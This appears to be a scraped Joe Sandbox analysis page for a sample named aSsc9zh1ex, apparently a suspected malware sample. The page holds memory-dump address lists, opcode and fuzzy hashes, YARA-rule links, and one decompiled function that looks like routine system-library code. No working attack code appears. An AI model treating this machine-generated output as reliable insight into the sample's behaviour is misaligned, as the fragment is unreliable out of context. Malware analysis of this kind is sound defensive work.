                                                                                                                              0x1d781eeb
                                                                                                                              0x1d781eeb
                                                                                                                              0x1d781ef1
                                                                                                                              0x1d781ef4
                                                                                                                              0x1d781ef6
                                                                                                                              0x1d781f60
                                                                                                                              0x1d781f63
                                                                                                                              0x1d781f7e
                                                                                                                              0x1d781f7e
                                                                                                                              0x00000000
                                                                                                                              0x1d781f7e
                                                                                                                              0x1d781f67
                                                                                                                              0x1d781f6b
                                                                                                                              0x1d781f70
                                                                                                                              0x1d781f72
                                                                                                                              0x1d781f7b
                                                                                                                              0x00000000
                                                                                                                              0x1d781f7b
                                                                                                                              0x00000000
                                                                                                                              0x1d781f74
                                                                                                                              0x1d781efd
                                                                                                                              0x1d781eff
                                                                                                                              0x1d781f02
                                                                                                                              0x1d781f0a
                                                                                                                              0x00000000
                                                                                                                              0x1d7b9f7e
                                                                                                                              0x1d781f23
                                                                                                                              0x1d781f27
                                                                                                                              0x1d781f87
                                                                                                                              0x00000000
                                                                                                                              0x1d781f87
                                                                                                                              0x1d781f2d
                                                                                                                              0x1d781f30
                                                                                                                              0x1d781f34
                                                                                                                              0x1d781f39
                                                                                                                              0x1d781f41
                                                                                                                              0x1d781f8c
                                                                                                                              0x1d781f8d
                                                                                                                              0x1d781f94
                                                                                                                              0x1d781f95
                                                                                                                              0x1d781f96
                                                                                                                              0x1d781f97
                                                                                                                              0x1d781f9b
                                                                                                                              0x1d781fa2
                                                                                                                              0x1d781fa5
                                                                                                                              0x1d781fad
                                                                                                                              0x1d781faf
                                                                                                                              0x1d781fb1
                                                                                                                              0x1d781fff
                                                                                                                              0x1d782001
                                                                                                                              0x00000000
                                                                                                                              0x1d782001
                                                                                                                              0x1d781fb3
                                                                                                                              0x1d781fb8
                                                                                                                              0x1d781fb9
                                                                                                                              0x1d781fbb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d781fc1
                                                                                                                              0x1d781fc3
                                                                                                                              0x1d781fc5
                                                                                                                              0x1d781ff8
                                                                                                                              0x00000000
                                                                                                                              0x1d781ff8
                                                                                                                              0x1d781fc7
                                                                                                                              0x1d781fca
                                                                                                                              0x1d781fca
                                                                                                                              0x1d781fce
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d781fd3
                                                                                                                              0x1d781fd5
                                                                                                                              0x1d781fd7
                                                                                                                              0x1d781fdd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d781fe5
                                                                                                                              0x1d781fe7
                                                                                                                              0x00000000
                                                                                                                              0x1d781ff0
                                                                                                                              0x1d781ff0
                                                                                                                              0x1d781ff3
                                                                                                                              0x1d781ff4
                                                                                                                              0x1d781ff4
                                                                                                                              0x00000000
                                                                                                                              0x1d781fca
                                                                                                                              0x1d781f43
                                                                                                                              0x1d781f45
                                                                                                                              0x1d781f48
                                                                                                                              0x1d781f4e
                                                                                                                              0x1d781f50
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c74cbd90cfa31ed074255a04d368f7a226c0228ce273c1010bb8c9dbd0041e93
                                                                                                                              • Instruction ID: 6d8d6c097f7afb1398d52e61bfd3f29dfe561e511bc25aa36d707a0e762aa949
                                                                                                                              • Opcode Fuzzy Hash: c74cbd90cfa31ed074255a04d368f7a226c0228ce273c1010bb8c9dbd0041e93
                                                                                                                              • Instruction Fuzzy Hash: BC21CF75A01309EFD721CF58E584A9ABBF8FF44760F11896BE949E7211D330ED008B92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7FD430 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 76%
                                                                                                                              			E1D7FD430(void* __ecx, intOrPtr _a4, signed int* _a8, void* _a12, signed int* _a16) {
				char _v8;
				char _v16;
				signed int _t21;
				signed int* _t37;
				void* _t38;
				signed int* _t39;
				void* _t40;
				void* _t41;

				_t38 = __ecx;
				_t21 = 0;
				_t37 = _a16;
				if(_t37 != 0) {
					_t21 =  *_t37;
				}
				_v8 = _t21 + 0xc;
				_t41 = E1D755D90(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t21 + 0xc);
				if(_t41 != 0) {
					_v16 = 0;
					_push( &_v8);
					_push(_v8);
					_push(_t41);
					_push(2);
					_push( &_v16);
					_push(_a4);
					_t40 = E1D782B00();
					if(_t40 == 0xc0000034) {
						_t40 = 0;
						 *(_t41 + 8) =  *(_t41 + 8) & 0;
						 *(_t41 + 4) =  *(_t41 + 4) & 0;
					}
					if(_t40 >= 0 || _t40 == 0x80000005) {
						if(_t37 != 0) {
							 *_t37 =  *(_t41 + 8);
						}
						_t39 = _a8;
						if(_t39 != 0) {
							 *_t39 =  *(_t41 + 4);
						}
					}
					if(_t40 >= 0 && _a12 != 0) {
						_t18 = _t41 + 0xc; // 0xc
						E1D7888C0(_a12, _t18,  *(_t41 + 8));
					}
					E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t41);
					return _t40;
				} else {
					return 0xc000009a;
				}
			}











                                                                                                                              0x1d7fd430
                                                                                                                              0x1d7fd438
                                                                                                                              0x1d7fd43b
                                                                                                                              0x1d7fd442
                                                                                                                              0x1d7fd444
                                                                                                                              0x1d7fd444
                                                                                                                              0x1d7fd44a
                                                                                                                              0x1d7fd45d
                                                                                                                              0x1d7fd461
                                                                                                                              0x1d7fd46c
                                                                                                                              0x1d7fd473
                                                                                                                              0x1d7fd474
                                                                                                                              0x1d7fd47a
                                                                                                                              0x1d7fd47b
                                                                                                                              0x1d7fd47d
                                                                                                                              0x1d7fd47e
                                                                                                                              0x1d7fd486
                                                                                                                              0x1d7fd48e
                                                                                                                              0x1d7fd490
                                                                                                                              0x1d7fd492
                                                                                                                              0x1d7fd495
                                                                                                                              0x1d7fd495
                                                                                                                              0x1d7fd49a
                                                                                                                              0x1d7fd4a6
                                                                                                                              0x1d7fd4ab
                                                                                                                              0x1d7fd4ab
                                                                                                                              0x1d7fd4ad
                                                                                                                              0x1d7fd4b2
                                                                                                                              0x1d7fd4b7
                                                                                                                              0x1d7fd4b7
                                                                                                                              0x1d7fd4b2
                                                                                                                              0x1d7fd4bb
                                                                                                                              0x1d7fd4c6
                                                                                                                              0x1d7fd4cd
                                                                                                                              0x1d7fd4d2
                                                                                                                              0x1d7fd4e1
                                                                                                                              0x00000000
                                                                                                                              0x1d7fd463
                                                                                                                              0x00000000
                                                                                                                              0x1d7fd463

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 575a3526d1c358682353366e68caeade6c1654175c3d3c744dba7750c30e3068
                                                                                                                              • Instruction ID: 17195dc5091e9c012106befd470abbf24bab14ba4f8414fdb00dad0d6c0edfa8
                                                                                                                              • Opcode Fuzzy Hash: 575a3526d1c358682353366e68caeade6c1654175c3d3c744dba7750c30e3068
                                                                                                                              • Instruction Fuzzy Hash: 2F215E36600646ABDB229F5DD884F6B77A9EF84670F11442AED3987221D630F901DB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7BFF03 Relevance: .1, Instructions: 74COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9c728007dedffa34f18ff37d04f38c3a6996812489d02c3588a958c6c646b912
                                                                                                                              • Instruction ID: 71fdd8a9c63558eba19d942433b421521058470e9f9c666b39e7e42d4d2f43c4
                                                                                                                              • Opcode Fuzzy Hash: 9c728007dedffa34f18ff37d04f38c3a6996812489d02c3588a958c6c646b912
                                                                                                                              • Instruction Fuzzy Hash: 5B21D0739083419FD701CF65D848B6BFBECEF82A64F0504A7BA4087261D736D909C6A3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D76BE80 Relevance: .1, Instructions: 73COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2275a51be25b8def86a7d164c40da0cb6a405588aabe597dae5513e67f7ae0ff
                                                                                                                              • Instruction ID: 85158f9f2be765c69d59a87bb9aea1ae9fd2da24aa44e7bb5014c3a6cd557c05
                                                                                                                              • Opcode Fuzzy Hash: 2275a51be25b8def86a7d164c40da0cb6a405588aabe597dae5513e67f7ae0ff
                                                                                                                              • Instruction Fuzzy Hash: 3421B071204311DFEB218F54C4C4B627BB4EB05768F0684AAEA084F296E7B4E814CBE3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73FAEC Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 83bdbddc7f081f116cfd5a5e5560267fcc03b69956c6229cc2f9c88a219cf52a
                                                                                                                              • Instruction ID: 8b03413ca1cf5eb077329b56a50ea4d1bd0a47ea7544ae95fa93b3825de6c4c1
                                                                                                                              • Opcode Fuzzy Hash: 83bdbddc7f081f116cfd5a5e5560267fcc03b69956c6229cc2f9c88a219cf52a
                                                                                                                              • Instruction Fuzzy Hash: A82121B2900621EFC704CF74C490679F3F5FF447B2F1185AAC9A9A7652E770AA00CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D74B950 Relevance: .1, Instructions: 71COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 26d427bfedb0c6d9a54de7f0d974f647ffff9b52d48287b12035b9db4aa33630
                                                                                                                              • Instruction ID: 3f7ada70745755823f968718010b878d5c461acf544c684b243803f4a260b155
                                                                                                                              • Opcode Fuzzy Hash: 26d427bfedb0c6d9a54de7f0d974f647ffff9b52d48287b12035b9db4aa33630
                                                                                                                              • Instruction Fuzzy Hash: E1210176209681CBD3178F98D894B25B3A9FB48B70F1982A6ED018B7E1D775EC00C663
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7D7C38 Relevance: .1, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ee17a0d1079a4772c603ff45f84419bb43025fe42eb990e5d19e7a9d1d14c39e
                                                                                                                              • Instruction ID: f598726cdd9f560987366de471a1ee6e33f60acf403bc16d2938ffc25f5287dc
                                                                                                                              • Opcode Fuzzy Hash: ee17a0d1079a4772c603ff45f84419bb43025fe42eb990e5d19e7a9d1d14c39e
                                                                                                                              • Instruction Fuzzy Hash: 2A216D72900649FFDF218F94CC84BAEBBB9EF88320F254416F909A7250D734D9519B51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D737B7D Relevance: .1, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7bb60e06752eecfd6eee39a0b5ec1f961358d572eb45ca4fcaec6bed0748b70d
                                                                                                                              • Instruction ID: 592f89749b03e7981a8f0883b1a25831d6ca63200b5d835da9d08dd2a06bfdf7
                                                                                                                              • Opcode Fuzzy Hash: 7bb60e06752eecfd6eee39a0b5ec1f961358d572eb45ca4fcaec6bed0748b70d
                                                                                                                              • Instruction Fuzzy Hash: 3C113376902301BBCF25AF28D440EAABBF6AF04B30F214427E98597281E630DC41C762
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7CFB45 Relevance: .1, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2fbc6e81673abbb8b84dd3661349fba6872fb2bd214454374c3a18aa1ae531a3
                                                                                                                              • Instruction ID: 0e56087153ea18cc5f3c09fec468e817a9e21e6ccc96894f6166e3602d98b502
                                                                                                                              • Opcode Fuzzy Hash: 2fbc6e81673abbb8b84dd3661349fba6872fb2bd214454374c3a18aa1ae531a3
                                                                                                                              • Instruction Fuzzy Hash: ED119D7BA02A13AFD7114E789CA4B21F374BB05375F154727EA64936A0C760E891CAD2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7614C9 Relevance: .1, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                                                              • Instruction ID: 82a0b2ce38de24d5b8b0462ce71f243a60b0e4e42d59ab37afa4ecb4004a5257
                                                                                                                              • Opcode Fuzzy Hash: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                                                              • Instruction Fuzzy Hash: 2F21F6326456819FE3029B99D948B26B7E9FF44B70F0A41A2DD048B6A2F735DC50C763
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73B705 Relevance: .1, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: e2183e4480ba30b745a24abb8dd1297f9799df467d38a63b616160bf23cb3465
                                                                                                                              • Instruction ID: 55661ff6226ef65fc10a03eb14d42e1c6725c9b24fd601742ef434e7acf14e01
                                                                                                                              • Opcode Fuzzy Hash: e2183e4480ba30b745a24abb8dd1297f9799df467d38a63b616160bf23cb3465
                                                                                                                              • Instruction Fuzzy Hash: 73217736005600EFC722DF18D981F69B7F4FF08369F124929E20A86672CB34F801CB96
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D769938 Relevance: .1, Instructions: 68COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a612bbf784feb212866b1a0590369a02d4dcf82f1c94ffcec620604e6849556b
                                                                                                                              • Instruction ID: b2db987f285429d7f8147f50bbd2e999117fdb2887bf700b1041508d6f1e5c8f
                                                                                                                              • Opcode Fuzzy Hash: a612bbf784feb212866b1a0590369a02d4dcf82f1c94ffcec620604e6849556b
                                                                                                                              • Instruction Fuzzy Hash: 42219DB2501342DFD7018F14C600995FBA6FF82329B55C5EAE94D8B224E731ED42CBE2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7CDA40 Relevance: .1, Instructions: 66COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: c9db7ad9e0fefbf164a53fc891a9ceae79b75b01a3efd5c48995d598c9e32d78
                                                                                                                              • Instruction ID: 71d3432f32f202c105c2d858a8dcc5b268bdd452bd900d877d8f717473487551
                                                                                                                              • Opcode Fuzzy Hash: c9db7ad9e0fefbf164a53fc891a9ceae79b75b01a3efd5c48995d598c9e32d78
                                                                                                                              • Instruction Fuzzy Hash: 53213A79605693EFC705CF1CD181764B7B2FB893B9B25C56AC10A8B7A2D731E841CB12
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77BBC0 Relevance: .1, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 248cb0af09196792891d5a18c4d66662902a7e6a793cc106dd9a3209007f8957
                                                                                                                              • Instruction ID: cd362e882d6aa493b6c99c1159345a0ee7e6b0c3c8a7f6dab4a78ad0cdc9e443
                                                                                                                              • Opcode Fuzzy Hash: 248cb0af09196792891d5a18c4d66662902a7e6a793cc106dd9a3209007f8957
                                                                                                                              • Instruction Fuzzy Hash: EB113F36709AD58BDB028B58D804B25B79AFF44771F194462ED108F7E1EA35EC00D253
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77BF0C Relevance: .1, Instructions: 64COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 65216b882e4aa422823f89a61a6c3d6c056bfdf0d570852e323e09c3c31ec7f2
                                                                                                                              • Instruction ID: 09cf9c537b3bda91c8d2a82d713b598f673c8ef46adb4549227a4e075906180a
                                                                                                                              • Opcode Fuzzy Hash: 65216b882e4aa422823f89a61a6c3d6c056bfdf0d570852e323e09c3c31ec7f2
                                                                                                                              • Instruction Fuzzy Hash: 8D11263A2015929BE7198B28D0D8771B3E4FF45F34F144C9BFA898B751D369E885CA22
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7E7591 Relevance: .1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c37d1aa8848cd550da22799c1df5cfb87fe47fbf46e58cfbeab863fcaf69da24
                                                                                                                              • Instruction ID: df2a0d46977937f6dc91ec765083ca28ca88f38f1a550c3ef7c4e4b6e8e3d63d
                                                                                                                              • Opcode Fuzzy Hash: c37d1aa8848cd550da22799c1df5cfb87fe47fbf46e58cfbeab863fcaf69da24
                                                                                                                              • Instruction Fuzzy Hash: 29212575E04219DFDF08CF98D490BECF3B0BB48769F20825AD529A7281CB756842CF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73FA44 Relevance: .1, Instructions: 61COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0618b16642c9786a4f8261004c1be5540226bb784326370feee92edf29b3d6f3
                                                                                                                              • Instruction ID: c549a0db30d05bb8f81c9297e4bd775f0bd1b2d87f7232d31d4b4e57ace9610f
                                                                                                                              • Opcode Fuzzy Hash: 0618b16642c9786a4f8261004c1be5540226bb784326370feee92edf29b3d6f3
                                                                                                                              • Instruction Fuzzy Hash: 5011D032604381BFD725CF50C800F2ABBBAEBC6770F14849AD5419B291E671AD418B92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D775921 Relevance: .1, Instructions: 59COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 672afbb917fe1811ae7aa3899e5f048dc855659a58cc3e13b7bcf7f9fc6d5870
